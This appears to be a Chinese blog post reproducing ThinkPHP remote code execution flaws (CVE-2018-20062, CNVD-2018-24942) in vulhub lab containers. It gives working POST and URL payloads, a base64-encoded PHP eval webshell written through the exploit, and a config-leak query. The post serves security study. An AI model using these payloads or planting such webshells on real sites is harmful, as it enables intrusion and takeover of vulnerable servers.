Thinkphp漏洞复现

逃离我推掉我的手 2023-10-07 22:07 9阅读 0赞

### Thinkphp简介 ###

Thinkphp 是一种开源框架。是一个由国人开发的支持 windows/Unix/Linux 等服 务器环境的轻量级PHP开发框架。很多cms就是基于 thinkphp 二次开发的，所以 thinkphp 出问题的话，会影响很 多基于 thinkphp 开发的网站。

#### Thinkphp历史漏洞 ####

<table style="width:500px;"> 
 <tbody> 
  <tr> 
   <td style="width:252px;">版本</td> 
   <td style="width:246px;">漏洞类型</td> 
  </tr> 
  <tr> 
   <td style="width:252px;">ThinkPHP3.2.3</td> 
   <td style="width:246px;">缓存函数设计缺陷可导致Getshell</td> 
  </tr> 
  <tr> 
   <td style="width:252px;">ThinkPHP3.2.3</td> 
   <td style="width:246px;">最新版update注入漏洞</td> 
  </tr> 
  <tr> 
   <td style="width:252px;">ThinkPHP3.2.X</td> 
   <td style="width:246px;">find_select_delete注入</td> 
  </tr> 
  <tr> 
   <td style="width:252px;">ThinkPHP3.X</td> 
   <td style="width:246px;">order_by注入漏洞</td> 
  </tr> 
  <tr> 
   <td style="width:252px;">ThinkPHP5.0.X</td> 
   <td style="width:246px;">sql注入漏洞</td> 
  </tr> 
  <tr> 
   <td style="width:252px;">ThinkPHP5.0.10</td> 
   <td style="width:246px;">缓存函数设计缺陷可导致Getshell</td> 
  </tr> 
  <tr> 
   <td style="width:252px;">ThinkPHP5</td> 
   <td style="width:246px;">SQL注入漏洞&amp;&amp;敏感信息泄露</td> 
  </tr> 
  <tr> 
   <td style="width:252px;">ThinkPHP5.X</td> 
   <td style="width:246px;">order_by注入漏洞</td> 
  </tr> 
  <tr> 
   <td style="width:252px;">ThinkPHP5.X</td> 
   <td style="width:246px;">远程代码执行</td> 
  </tr> 
 </tbody> 
</table>

### 漏洞复现 ###

Thinkphp5.0.23远程代码执行漏洞(CVE-2018-20062)  
漏洞简介

Thinkphp5.0.23以前的版本中，获取method的方法中没有正确处理方法名，导致攻击者可以调用Request类任意方法并构造利用链，从而导致远程代码执行漏洞

影响版本：  
Thinkphp 5.0.0~ 5.0.23

搭建靶场环境  
使用vulhub靶场搭建

> cd vulhub/thinkphp/5.0.23-rce
> 
> docker-compose up -d

![a1d11c822f8f41f1928742d0b325a661.png][]

> 访问your-ip:8080/?s=captcha
> 
> POST提交：  
> \_method=\_\_construct&filter\[\]=system&method=get&server\[REQUEST\_METHOD\]=id

代码执行成功

![35ed7ebece3043e4b4023f7ba62e06a2.png][]

写入webshell

进入容器：docker exec -it 32736eb79481 /bin/bash

webshell：<?php @eval ($\_POST\['cmd'\]);?>

base64编码后：PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4=

写入容器：

> echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d > a.php

![e1bf12956e3647fb94ea311580be1d30.png][]

访问：http://your-ip:8080/?s=captcha

POST提交：

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo -n PD9waHAgQGV2YWwoJF9QT1NUWydjbWQnXSk7Pz4= | base64 -d >cmd.php

![9c1a7015eb624ceba35dde57e568dad7.png][]

蚁剑链接：

![318bbba754a94dce9e0aef52aa77e5c2.png][]![7d6ca70717bf4be8990449c50e0c9125.png][]

执行命令：

![b18e6c38c85b41308fcc5f0d4adf0ede.png][]

#### ThinkPHP 5.0.x 未开启强制路由导致的RCE 漏洞分析(CNVD-2018-24942) ####

原理：框架对传入的路由参数过滤不严格，导致攻击者可以操作非预期的控制器类来远程执行代码。

影响版本：ThinkPHP 5.0.5-5.0.22 || 5.1.0-5.1.30

搭建靶场环境  
使用vulhub靶场搭建

> cd vulhub/thinkphp/5-rce
> 
> docker-compose up -d

payload1:

index.php?s=index/\think\app/invokefunction&function=phpinfo&vars[0]=-1

![bb286ce384bb464282afcb0436a337a9.png][]

payload2:

?s=index/think\config/get&name=database.username # 获取配置信息
    ?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id #命令执行

![611225335e9449f2af975dba46e9b45c.png][]![f7dd3bbc8e2e40d3b7a8d950b14eac6e.png][]

参考链接：

[https://www.cnblogs.com/HelloCTF/p/15748360.html][https_www.cnblogs.com_HelloCTF_p_15748360.html]

[https://blog.csdn.net/qq\_61503377/article/details/125989830?spm=1001.2014.3001.5501][https_blog.csdn.net_qq_61503377_article_details_125989830_spm_1001.2014.3001.5501]

[a1d11c822f8f41f1928742d0b325a661.png]: https://img-blog.csdnimg.cn/a1d11c822f8f41f1928742d0b325a661.png
[35ed7ebece3043e4b4023f7ba62e06a2.png]: https://img-blog.csdnimg.cn/35ed7ebece3043e4b4023f7ba62e06a2.png
[e1bf12956e3647fb94ea311580be1d30.png]: https://img-blog.csdnimg.cn/e1bf12956e3647fb94ea311580be1d30.png
[9c1a7015eb624ceba35dde57e568dad7.png]: https://img-blog.csdnimg.cn/9c1a7015eb624ceba35dde57e568dad7.png
[318bbba754a94dce9e0aef52aa77e5c2.png]: https://img-blog.csdnimg.cn/318bbba754a94dce9e0aef52aa77e5c2.png
[7d6ca70717bf4be8990449c50e0c9125.png]: https://img-blog.csdnimg.cn/7d6ca70717bf4be8990449c50e0c9125.png
[b18e6c38c85b41308fcc5f0d4adf0ede.png]: https://img-blog.csdnimg.cn/b18e6c38c85b41308fcc5f0d4adf0ede.png
[bb286ce384bb464282afcb0436a337a9.png]: https://img-blog.csdnimg.cn/bb286ce384bb464282afcb0436a337a9.png
[611225335e9449f2af975dba46e9b45c.png]: https://img-blog.csdnimg.cn/611225335e9449f2af975dba46e9b45c.png
[f7dd3bbc8e2e40d3b7a8d950b14eac6e.png]: https://img-blog.csdnimg.cn/f7dd3bbc8e2e40d3b7a8d950b14eac6e.png
[https_www.cnblogs.com_HelloCTF_p_15748360.html]: https://www.cnblogs.com/HelloCTF/p/15748360.html
[https_blog.csdn.net_qq_61503377_article_details_125989830_spm_1001.2014.3001.5501]: https://blog.csdn.net/qq_61503377/article/details/125989830?spm=1001.2014.3001.5501